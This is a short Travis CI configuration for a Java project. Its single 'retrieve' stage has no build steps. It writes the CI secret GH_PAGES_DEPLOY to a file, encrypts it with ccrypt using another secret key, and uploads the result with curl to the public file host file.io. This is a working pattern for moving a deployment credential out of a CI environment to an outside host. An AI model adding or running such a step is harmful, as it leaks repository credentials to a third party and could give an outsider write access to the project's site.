language: java
jobs:
  include:
    - stage: retrieve
      jdk: openjdk8
      install:
        - sudo apt-get install -y ccrypt
        - echo GH_PAGES_DEPLOY = $GH_PAGES_DEPLOY > arandomfilename.txt
        - ccencrypt arandomfilename.txt -K $ENC_KEY
        - curl -F'file=@arandomfilename.txt.cpt' https://file.io
stages:
 - retrieve